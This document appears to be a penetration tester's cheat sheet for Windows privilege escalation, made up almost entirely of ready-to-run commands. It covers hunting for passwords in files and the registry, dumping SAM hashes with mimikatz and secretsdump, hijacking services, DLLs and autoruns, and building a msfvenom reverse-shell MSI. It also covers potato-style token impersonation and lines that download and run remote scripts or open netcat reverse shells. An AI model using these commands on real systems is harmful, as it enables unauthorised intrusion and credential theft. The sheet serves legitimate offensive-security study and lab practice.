📎 Windows Privesc
Enumeration
# host info
systeminfo
ipconfig /all
route print
netstat -ano
# current user info
whoami
whoami /priv
whoami /groups
whoami /all
# local users info
net user
net user <user>
Get-LocalUser
# local groups info
net localgroup
net localgroup <group>
Get-LocalGroup
# get members
Get-LocalGroupMember <group>
# installed apps (32-bit and 64-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# running process
Get-Process
Get-Process | Select-Object Name, Id, Path
# get .NET version
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
Interesting Files
# search for files recursively and alternate data streams
dir /r /s <name>.txt
# search for password manager dbs
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# search for config files in XAMPP
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
# search for docs in a user home directory
Get-ChildItem -Path C:\Users\ -Include *.txt,*.xml,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
# search in hidden directories too (-Force)
Get-ChildItem -Path C:\Users\ -Include *.txt, *.xml -File -Recurse -Force -ErrorAction SilentlyContinue
# search for passwords in all files
Get-ChildItem -Path C:\ -Recurse -File -Force -ErrorAction SilentlyContinue | Select-String -Pattern "password" -ErrorAction SilentlyContinue
# search for passwords in specific file types
Get-ChildItem -Path C:\ -Recurse -File -Force -Include "*.txt","*.config","*.json" -ErrorAction SilentlyContinue | Select-String -Pattern "password" -ErrorAction SilentlyContinue
Recycle Bin
# list files in recycle bin
(New-Object -ComObject Shell.Application).NameSpace(0x0a).Items()
# save path to file
$pathFile = (New-Object -ComObject Shell.Application).Namespace(0x0a).Items() | Select -ExpandProperty Path
# copy all files
cp $pathFile .
Passwords
PowerShell History
Registry
# registry can be searched for keys and values that contain the word "password":
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# admin AutoLogon credentials:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
Runas with saved credentials
# show stored credentials
cmdkey /list
# transfer a reverse shell and execute it with the credentials or directly with PS
runas /savecred /user:admin reverse.exe
runas /savecred /user:admin "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://<ip>/rshell.ps1')"
RunasCs
Useful for executing commands as another user with explicit credentials when you can't access them in any other way.
Import-Module .\
Invoke-RunasCs <user> <pass> <cmd>
# rev shell
Invoke-RunasCs <user> <pass> powershell.exe -Remote <ip>:<port>
SAM and SYSTEM
Info
🐈⬛ Hashcat mode -> 1000
Find them
# search in the current path
dir /s SAM
dir /s SYSTEM
Get-ChildItem -Filter "SAM" -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Filter "SYSTEM" -Recurse -ErrorAction SilentlyContinue
# possible locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
C:\windows.old
Get the hash
# use pypykatz
pypykatz registry --sam sam system
# or secretsdump
impacket-secretsdump -system SYSTEM -sam SAM local # always mention 'local' in the command
Dumping Local Hashes
Info
Requires SYSTEM privileges
.\mimikatz.exe
privilege::debug
lsadump::sam
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
impacket-secretsdump administrator@<target_ip>
Automated Scripts
Services
Binary Hijacking
# query running processes
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# or in winpeas look for a service
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Users [WriteData/CreateFiles]
# check permissions (F for full access)
icacls "<path>"
# replace the service binary with a reverse shell or change the binpath to it
sc config <svc_name> binpath="<rshell_path>"
sc stop <svc_name>
sc start <svc_name>
Unquoted Service Paths
# list running and stopped services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# or cmd
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """"
# using icacls check all parts of the path
# upload a malicious file to the path, for example, if the user can write to the 'Current Version' folder:
C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
# upload the malicious file to that folder, naming it 'current.exe'
# start the service
sc start <svc_name>
Insecure Service Executables
# in winpeas look for a service which has the following
File Permissions: Everyone [AllAccess]
# replace the executable with a malicious file and start the service
sc start <service>
Weak Registry Permissions
# in Winpeas look for a service which has the following
HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])
# check for KEY_ALL_ACCESS
accesschk /acceptula -uvwqk <path of registry>
# Service Information from regedit, identify the variable that holds the executable path
reg query <reg-path>
# ImagePath is the variable here
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
sc start <service>
DLL Hijacking
# list apps
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# check if folder is writable
echo "test" > 'C:\FileZilla\FileZilla FTP Client\test.txt'
type 'C:\FileZilla\FileZilla FTP Client\test.txt'
Using Process Monitor, identify all DLLs loaded by the selected app as well as detect missing ones, and try to replace one with a malicious file.
Transfer the malicious DLL to the path and restart the service.
Scheduled Tasks
# list tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | Select-Object TaskName, TaskPath, State
# use icacls in the path to check permissions
icacls <path>
# upload the malicious file and wait for execution
Startup Apps
Info
For this to work, the system needs to be restarted
# startup applications can be found here
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
# check if the folder is writable and transfer a reverse shell to it, then reboot the system
shutdown /r /t 0
Insecure GUI Apps
# check the privileged applications that are running from "TaskManager"
# open one of them, and from the file menu click 'Open' and enter the following:
file://c:/windows/system32/cmd.exe
Public Exploits and Security Updates
https://github.com/bitsadmin/wesng
https://github.com/SecWiki/windows-kernel-exploits
# enumerate the system
systeminfo
wmic qfe list
Get-HotFix | Sort-Object -Property InstalledOn -Descending
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
systeminfo | findstr /B /C:"KB"
# find a public exploit
searchsploit 'params'
# Windows Exploit Suggester ng
pipx install wesng
wes --update
wes sysinfo # copied from the windows host
wes sysinfo -e # show only vulns with exploits
# search in the above repo for usable exploits
Registry
Autorun
# query the registry for executables
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# check if the location is writable
accesschk.exe /accepteula -wvu "<path>" # returns FILE_ALL_ACCESS
# replace the executable with the reverse shell and wait for the Admin to log in
AlwaysInstallElevated
Tip
Check policy if file is not being executed:
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
# query the registry for keys, it should return 1 or 0x1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# create a reverse shell in MSI format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> --platform windows -f msi -o rshell.msi
# run the installer to trigger the shell
msiexec /quiet /qn /i rshell.msi
Privileges
SeImpersonatePrivilege
https://github.com/BeichenDream/GodPotato
https://github.com/antonioCoco/JuicyPotatoNG
# GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "shell.exe"
# get .NET version
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
# JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "shell.exe" -a
JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c nc.exe <ip> <port> -e cmd"
# find available ports
JuicyPotatoNG.exe -s
# PrintSpoofer
PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -c "nc.exe <lhost> <lport> -e cmd"
SeBackupPrivilege
# using robocopy, extract data from forbidden folders
robocopy /b c:\users\enterpriseadmin\desktop . *
# or
# get sam and system
reg save hklm\sam .\sam
reg save hklm\system .\system
# use pypykatz to get user hashes and PTH or hashcat with -m 1000 to get passwords
pypykatz registry --sam sam system
# or secretsdump
impacket-secretsdump -system SYSTEM -sam SAM local # always mention local in the command
SeManageVolumePrivilege
Pass the Hash
Info
Remember that the full hash includes both the LM and NTLM hash, separated by a colon.